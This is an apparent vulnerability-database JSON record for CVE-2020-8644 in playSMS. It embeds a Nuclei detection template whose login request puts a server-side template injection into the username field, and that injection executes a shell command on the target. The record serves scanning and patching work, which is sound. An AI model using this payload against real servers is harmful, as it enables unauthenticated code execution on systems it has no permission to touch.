{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-8644/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-8644/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-8644/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-8644/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-8644/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-8644"},"sightings":{"href":"/api/v1/sightings/cve-2020-8644"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.86689,"kev":true,"percentile":0.99733},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-8644.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2020-8644\n\ninfo:\n  name: playSMS <1.4.3 - Remote Code Execution\n  author: dbrwsky\n  severity: critical\n  description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n  remediation: |\n    Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.\n  reference:\n    - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/\n    - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-8644\n    - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html\n    - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-8644\n    cwe-id: CWE-94\n    epss-score: 0.86689\n    epss-percentile: 0.99733\n    cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: playsms\n    product: playsms\n  tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\n        Host: {{Hostname}}\n        Origin: {{BaseURL}}\n      - |\n        POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\n        Host: {{Hostname}}\n        Origin: {{BaseURL}}\n        Content-Type: application/x-www-form-urlencoded\n\n        X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '4468-0202-EVC'\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: xpath\n        name: csrf\n        internal: true\n        xpath:\n          - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input\n        attribute: value\n        part: body\n# digest: 4a0a0047304502204fe74f6eca9cc0c570b01cd5fe4a7a90786fe812f9ec6dc171e4529f20d6e73102210094226e025b53a852387fe51621b43c7ede236f1ea4b7338610cab3fc7119f8a2:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-8644"}